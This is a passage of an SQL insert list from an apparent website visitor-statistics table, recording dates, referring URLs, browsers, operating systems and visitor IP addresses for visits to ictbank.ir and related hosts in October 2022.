(24821,'2022-10-07','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(24822,'2022-10-07','http://ictbank.ir/blog','Chrome','Windows','100.0.4896.75','desktop','Unknown','','209.170.91.200','000',0,1,0),
(24823,'2022-10-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.6.75','000',0,1,0),
(24824,'2022-10-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','108.61.123.152','000',0,1,0),
(24825,'2022-10-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,2,0),
(24826,'2022-10-07','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.97','desktop','Unknown','','185.119.81.107','000',0,2,0),
(24827,'2022-10-08','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24828,'2022-10-08','http://ictbank.ir/blog','Chrome','Windows','68.0.3440.84','desktop','Unknown','','185.119.81.107','000',0,6,0),
(24829,'2022-10-08','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(24830,'2022-10-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.61.185.140','000',0,2,0),
(24831,'2022-10-08','http://ictbank.ir/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','20.9.35.96','000',0,1,0),
(24832,'2022-10-08','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','185.39.144.147','000',0,1,0),
(24833,'2022-10-08','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(24834,'2022-10-08','http://ictbank.ir/blog','Chrome','Windows','10.0.648.133','desktop','Unknown','','208.80.194.121','000',0,5,0),
(24835,'2022-10-08','http://ictbank.ir/blog','Chrome','Windows','81.0.4044.129','desktop','Unknown','','185.119.81.105','000',0,4,0),
(24836,'2022-10-08','http://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.105','000',0,1,0),
(24837,'2022-10-08','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,2,0),
(24838,'2022-10-08','http://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.101','000',0,1,0),
(24839,'2022-10-08','http://mail.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.181','000',0,1,0),
(24840,'2022-10-08','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24841,'2022-10-08','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.240.173','000',0,1,0),
(24842,'2022-10-08','http://ictbank.ir/blog','Chrome','Windows','102.0.5005.63','desktop','Unknown','','185.27.99.146','000',0,1,0),
(24843,'2022-10-08','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.211.113.218','000',0,1,0),
(24844,'2022-10-08','http://ictbank.ir/blog','Firefox','Linux','68.0','desktop','Unknown','','15.206.235.52','000',0,1,0),
(24845,'2022-10-08','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','185.119.81.108','000',0,4,0),
(24846,'2022-10-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.184.197','000',0,1,0),
(24847,'2022-10-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(24848,'2022-10-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24849,'2022-10-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(24850,'2022-10-08','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(24851,'2022-10-08','http://ictbank.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','213.251.184.216','000',0,1,0),
(24852,'2022-10-08','http://ictbank.ir/blog','Chrome','OS X','11.0.696.68','desktop','Macintosh','','208.80.194.122','000',0,1,0),
(24853,'2022-10-08','http://82.102.9.14:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.65.181','000',0,1,0),
(24854,'2022-10-08','http://ictbank.ir/blog','Firefox','Windows','1.5.0.11','desktop','Unknown','','51.195.166.195','000',0,1,0),
(24855,'2022-10-08','http://ictbank.ir/blog','Firefox','Windows','1.5.0.11','desktop','Unknown','','185.233.100.23','000',0,1,0),
(24856,'2022-10-09','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','5.189.178.166','000',0,2,0),
(24857,'2022-10-09','http://ictbank.ir/blog','Chrome','Windows','59.0.3071.115','desktop','Unknown','','185.119.81.105','000',0,2,0),
(24858,'2022-10-09','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,1,0),
(24859,'2022-10-09','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24860,'2022-10-09','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.38','000',0,1,0),
(24861,'2022-10-09','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(24862,'2022-10-09','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.135','desktop','Unknown','','185.119.81.107','000',0,2,0),
(24863,'2022-10-09','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','100.24.119.26','000',0,1,0),
(24864,'2022-10-09','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.28','000',0,3,0),
(24865,'2022-10-09','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.58','000',0,2,0),
(24866,'2022-10-09','http://ictbank.ir/blog','Chrome','Windows','9.0.597.94','desktop','Unknown','','208.80.194.126','000',0,1,0),
(24867,'2022-10-09','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','175.6.58.147','000',0,1,0),
(24868,'2022-10-09','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(24869,'2022-10-10','http://ictbank.ir/blog/category/database/','Chrome','Windows','106.0.0.0','desktop','Unknown','','85.133.232.202','000',0,1,0),
(24870,'2022-10-10','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.157','desktop','Unknown','','185.119.81.105','000',0,2,0),
(24871,'2022-10-10','http://ictbank.ir/blog/index.php/tag/script/','Chrome','Windows','90.0.4430.93','desktop','Unknown','','37.139.53.50','000',0,7,0),
(24872,'2022-10-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(24873,'2022-10-10','http://45.92.94.221/blog','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.210','000',0,1,0),
(24874,'2022-10-10','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(24875,'2022-10-10','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(24876,'2022-10-10','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,1,0),
(24877,'2022-10-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.216.177.19','000',0,1,0),
(24878,'2022-10-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','207.154.229.141','000',0,1,0),
(24879,'2022-10-11','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,2,0),
(24880,'2022-10-11','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24881,'2022-10-11','http://ictbank.ir/blog','Chrome','Windows','106.0.0.0','desktop','Unknown','','85.133.232.202','000',0,1,0),
(24882,'2022-10-11','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','42.83.147.34','000',0,2,0),
(24883,'2022-10-11','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.7','000',0,2,0),
(24884,'2022-10-11','http://ictbank.ir/blog','Chrome','Windows','11.0.696.68','desktop','Unknown','','208.80.194.126','000',0,2,0),
(24885,'2022-10-11','http://45.92.94.221/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','117.33.144.21','000',0,1,0),
(24886,'2022-10-11','http://ictbank.ir/blog','Firefox','OS X','5.0.1','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(24887,'2022-10-11','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(24888,'2022-10-11','https://www.google.com/','Firefox','Ubuntu','105.0','desktop','Unknown','','213.74.41.35','000',0,1,0),
(24889,'2022-10-11','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','18.236.102.114','000',0,1,0),
(24890,'2022-10-11','http://ictbank.ir/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','23.229.104.2','000',0,2,0),
(24891,'2022-10-11','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.210','000',0,2,0),
(24892,'2022-10-11','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,1,0),
(24893,'2022-10-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','198.211.125.219','000',0,2,0),
(24894,'2022-10-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(24895,'2022-10-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24896,'2022-10-11','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.55','000',0,1,0),
(24897,'2022-10-11','http://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','223.29.253.152','000',0,10,0),
(24898,'2022-10-11','http://ictbank.ir/blog','Firefox','Windows','7.0.1','desktop','Unknown','','208.80.194.122','000',0,1,0),
(24899,'2022-10-11','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','43.138.136.44','000',0,2,0),
(24900,'2022-10-12','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,4,0),
(24901,'2022-10-12','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,7,0),
(24902,'2022-10-12','http://ictbank.ir/blog','Chrome','Windows','100.0.4895.86','desktop','Unknown','','5.188.62.26','000',0,3,0),
(24903,'2022-10-12','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(24904,'2022-10-12','https://www.bing.com/','Edge','Windows','106.0.1370.37','desktop','Unknown','','202.91.135.88','000',0,1,0),
(24905,'2022-10-12','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','185.142.236.43','000',0,1,0),
(24906,'2022-10-12','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.11','000',0,1,0),
(24907,'2022-10-12','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(24908,'2022-10-12','https://www.google.com/','Chrome','Linux','100.0.4896.75','desktop','Unknown','','42.106.122.190','000',0,1,0),
(24909,'2022-10-12','http://ictbank.ir/blog','Chrome','Windows','86.0.4240.198','desktop','Unknown','','52.250.30.131','000',0,2,0),
(24910,'2022-10-12','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','52.11.19.62','000',0,1,0),
(24911,'2022-10-12','http://ictbank.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','167.99.118.196','000',0,1,0),
(24912,'2022-10-12','http://ictbank.ir/blog','Chrome','Windows','78.0.3904.87','desktop','Unknown','','185.119.81.104','000',0,4,0),
(24913,'2022-10-12','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','65.21.206.45','000',0,1,0),
(24914,'2022-10-12','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24915,'2022-10-12','https://www.ecosia.org/','Chrome','Windows','105.0.5195.102','desktop','Unknown','','155.136.158.9','000',0,1,0),
(24916,'2022-10-12','http://ictbank.ir/blog','Chrome','OS X','106.0.0.0','desktop','Macintosh','','31.2.150.174','000',0,1,0),
(24917,'2022-10-12','http://45.92.94.221/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','45.43.62.46','000',0,3,0),
(24918,'2022-10-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.209','000',0,1,0),
(24919,'2022-10-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24920,'2022-10-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(24921,'2022-10-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24922,'2022-10-12','http://ictbank.ir/blog','Chrome','Windows','106.0.0.0','desktop','Unknown','','197.243.61.202','000',0,1,0),
(24923,'2022-10-12','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(24924,'2022-10-12','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(24925,'2022-10-12','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','161.35.186.117','000',0,2,0),
(24926,'2022-10-13','http://ictbank.ir/blog','Chrome','Windows','9.0.597.94','desktop','Unknown','','208.80.194.126','000',0,2,0),
(24927,'2022-10-13','http://ictbank.ir/blog','Chrome','OS X','53.0.2785.143','desktop','Macintosh','','60.191.125.35','000',0,1,0),
(24928,'2022-10-13','http://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','152.89.196.13','000',0,2,0),
(24929,'2022-10-13','http://wikisonnati.com','Chrome','Windows','50.0.2661.75','desktop','Unknown','','37.187.152.127','000',0,2,0),
(24930,'2022-10-13','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','208.80.194.121','000',0,4,0),
(24931,'2022-10-13','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,14,0),
(24932,'2022-10-13','http://ns10.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','128.14.209.242','000',0,2,0),
(24933,'2022-10-13','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24934,'2022-10-13','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','161.35.137.53','000',0,1,0),
(24935,'2022-10-13','http://design-arena.ir','Chrome','Windows','58.0.1145.75','desktop','Unknown','','159.65.44.109','000',0,2,0),
(24936,'2022-10-13','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.122','000',0,1,0),
(24937,'2022-10-13','http://www.ictbank.ir/blog','Chrome','Linux','89.0.4389.82','desktop','Unknown','','144.91.106.14','000',0,2,0),
(24938,'2022-10-13','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','65.21.206.44','000',0,2,0),
(24939,'2022-10-13','http://ictbank.ir/blog','Chrome','Windows','81.0.4044.138','desktop','Unknown','','185.119.81.104','000',0,2,0),
(24940,'2022-10-13','http://wikisonnati.com','Chrome','Windows','58.0.1145.75','desktop','Unknown','','190.210.19.131','000',0,2,0),
(24941,'2022-10-13','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,2,0),
(24942,'2022-10-13','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.149.82.41','000',0,1,0),
(24943,'2022-10-13','http://45.92.94.221/blog','Firefox','Ubuntu','105.0','desktop','Unknown','','128.199.25.122','000',0,2,0),
(24944,'2022-10-13','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','20.219.3.204','000',0,1,0),
(24945,'2022-10-13','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','20.193.141.185','000',0,2,0),
(24946,'2022-10-13','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','42.83.147.34','000',0,2,0),
(24947,'2022-10-13','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.251.102.90','000',0,2,0),
(24948,'2022-10-13','http://design-arena.ir/blog','Safari','iOS','6.0','tablet','iPad','','93.158.90.156','000',0,1,0),
(24949,'2022-10-13','http://design-arena.ir/blog/','Safari','iOS','6.0','tablet','iPad','','93.158.90.168','000',0,1,0),
(24950,'2022-10-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.35','000',0,1,0),
(24951,'2022-10-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(24952,'2022-10-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(24953,'2022-10-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(24954,'2022-10-13','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','4.233.141.56','000',0,1,0),
(24955,'2022-10-13','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.72','000',0,2,0),
(24956,'2022-10-14','http://ictbank.ir/blog','Chrome','Windows','9.0.597.94','desktop','Unknown','','208.80.194.126','000',0,6,0),
(24957,'2022-10-14','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(24958,'2022-10-14','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(24959,'2022-10-14','http://ictbank.ir/blog/index.php/homepage_test/','Chrome','Windows','90.0.4427.0','desktop','Unknown','','37.139.53.30','000',0,8,0),
(24960,'2022-10-14','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.121','desktop','Unknown','','187.92.23.82','000',0,7,0),
(24961,'2022-10-14','http://ictbank.ir/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','67.227.13.29','000',0,1,0),
(24962,'2022-10-14','http://45.92.94.221/blog','Chrome','Windows','49.0.2623.112','desktop','Unknown','','171.34.178.15','000',0,1,0),
(24963,'2022-10-14','http://ictbank.ir/blog','Chrome','Linux','12.0.742.100','desktop','Unknown','','208.80.194.122','000',0,1,0),
(24964,'2022-10-14','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.144.201','000',0,2,0),
(24965,'2022-10-14','http://wikisonnati.com/blog','Chrome','Windows','103.0.5060.114','desktop','Unknown','','130.255.166.97','000',0,1,0),
(24966,'2022-10-14','http://wikisonnati.com/blog/','Chrome','Windows','103.0.5060.114','desktop','Unknown','','130.255.166.121','000',0,1,0),
(24967,'2022-10-14','http://45.92.94.221/blog','Chrome','Windows','49.0.2623.112','desktop','Unknown','','45.249.246.151','000',0,1,0),
(24968,'2022-10-14','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.187.160.88','000',0,1,0),
(24969,'2022-10-14','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','51.254.199.11','000',0,2,0),
(24970,'2022-10-14','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.121','000',0,1,0),
(24971,'2022-10-14','http://45.92.94.221/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','185.180.143.47','000',0,2,0),
(24972,'2022-10-14','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','51.132.231.206','000',0,1,0),
(24973,'2022-10-14','http://ictbank.ir/blog','Chrome','Windows','100.0.4896.75','desktop','Unknown','','163.116.136.254','000',0,2,0),
(24974,'2022-10-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.32.144.195','000',0,1,0),
(24975,'2022-10-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.184.197','000',0,1,0),
(24976,'2022-10-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(24977,'2022-10-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(24978,'2022-10-14','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.134','000',0,2,0),
(24979,'2022-10-14','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','65.21.206.44','000',0,2,0),
(24980,'2022-10-15','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,18,0),
(24981,'2022-10-15','http://wikisonnati.com/blog','Firefox','OS X','102.0','desktop','Macintosh','','51.159.210.188','000',0,16,0),
(24982,'2022-10-15','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','208.80.194.121','000',0,4,0),
(24983,'2022-10-15','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24984,'2022-10-15','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24985,'2022-10-15','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.209','000',0,1,0),
(24986,'2022-10-15','http://ictbank.ir/blog','Chrome','Windows','60.0.3004.97','desktop','Unknown','','3.95.204.176','000',0,2,0),
(24987,'2022-10-15','http://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','184.94.240.88','000',0,2,0),
(24988,'2022-10-15','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.81','000',0,2,0),
(24989,'2022-10-15','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.221.178.191','000',0,2,0),
(24990,'2022-10-15','http://www.gumbo.com/','Firefox','Windows','25.0','desktop','Unknown','','35.84.132.116','000',0,2,0),
(24991,'2022-10-15','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(24992,'2022-10-15','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(24993,'2022-10-15','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','52.207.252.233','000',0,2,0),
(24994,'2022-10-15','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.134','000',0,2,0),
(24995,'2022-10-15','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.91.87.55','000',0,1,0),
(24996,'2022-10-15','http://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,3,0),
(24997,'2022-10-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(24998,'2022-10-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,2,0),
(24999,'2022-10-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(25000,'2022-10-15','http://www.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','193.118.53.138','000',0,2,0),
(25001,'2022-10-15','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','144.172.73.16','000',0,1,0),
(25002,'2022-10-15','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','144.172.73.66','000',0,1,0),
(25003,'2022-10-15','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','141.255.161.166','000',0,1,0),
(25004,'2022-10-15','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','171.25.193.25','000',0,1,0),
(25005,'2022-10-16','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','66.240.236.119','000',0,1,0),
(25006,'2022-10-16','http://45.92.94.221/blog','Chrome','Linux','44.0.2403.157','desktop','Unknown','','104.248.44.91','000',0,2,0),
(25007,'2022-10-16','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','185.180.143.147','000',0,2,0),
(25008,'2022-10-16','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.121','000',0,7,0),
(25009,'2022-10-16','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,6,0),
(25010,'2022-10-16','http://ictbank.ir/blog','Chrome','Windows','106.0.5249.119','desktop','Unknown','','199.127.56.236','000',0,1,0),
(25011,'2022-10-16','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.122','000',0,3,0),
(25012,'2022-10-16','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(25013,'2022-10-16','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','79.124.8.3','000',0,3,0),
(25014,'2022-10-16','http://ictbank.ir/blog','Firefox','Windows','1.5.0.8','desktop','Unknown','','54.234.226.117','000',0,1,0),
(25015,'2022-10-16','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25016,'2022-10-16','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.216.101.3','000',0,2,0),
(25017,'2022-10-16','https://www.bing.com','Chrome','OS X','41.0.2227.1','desktop','Macintosh','','46.101.150.34','000',0,1,0),
(25018,'2022-10-16','http://ictbank.ir/blog','Safari','iOS','15.6','mobile:smart','iPhone','','192.71.3.26','000',0,1,0),
(25019,'2022-10-16','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','20.58.17.15','000',0,1,0),
(25020,'2022-10-16','http://ictbank.ir/blog','Chrome','OS X','91.0.4472.114','desktop','Macintosh','','3.14.12.139','000',0,5,0),
(25021,'2022-10-16','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,1,0),
(25022,'2022-10-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','198.211.125.219','000',0,1,0),
(25023,'2022-10-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.209','000',0,1,0),
(25024,'2022-10-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,2,0),
(25025,'2022-10-16','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','51.132.231.226','000',0,1,0),
(25026,'2022-10-16','http://ictbank.ir/blog','Chrome','Linux','63.0.3239.84','desktop','Unknown','','136.143.177.61','000',0,3,0),
(25027,'2022-10-16','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.742.112','desktop','Unknown','','208.80.194.126','000',0,3,0),
(25028,'2022-10-16','http://ictbank.ir/blog','Chrome','Windows','78.0.3904.97','desktop','Unknown','','173.252.127.22','000',0,1,0),
(25029,'2022-10-16','http://ictbank.ir/blog','Chrome','Windows','78.0.3904.97','desktop','Unknown','','173.252.127.116','000',0,1,0),
(25030,'2022-10-17','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','51.132.231.206','000',0,1,0),
(25031,'2022-10-17','http://wikisonnati.com/blog','Firefox','OS X','102.0','desktop','Macintosh','','51.159.210.188','000',0,4,0),
(25032,'2022-10-17','http://ictbank.ir/blog','Vivaldi','Linux','5.3.2679.68','desktop','Unknown','','168.90.199.200','000',0,12,0),
(25033,'2022-10-17','http://www.ictbank.ir/blog','Vivaldi','Linux','5.3.2679.68','desktop','Unknown','','170.83.178.250','000',0,2,0),
(25034,'2022-10-17','http://musettastore.com','Chrome','Windows','43.0.2376.69','desktop','Unknown','','46.219.205.115','000',0,4,0),
(25035,'2022-10-17','http://ictbank.ir/blog','Opera','Windows','8.01','desktop','Unknown','','208.80.194.122','000',0,2,0),
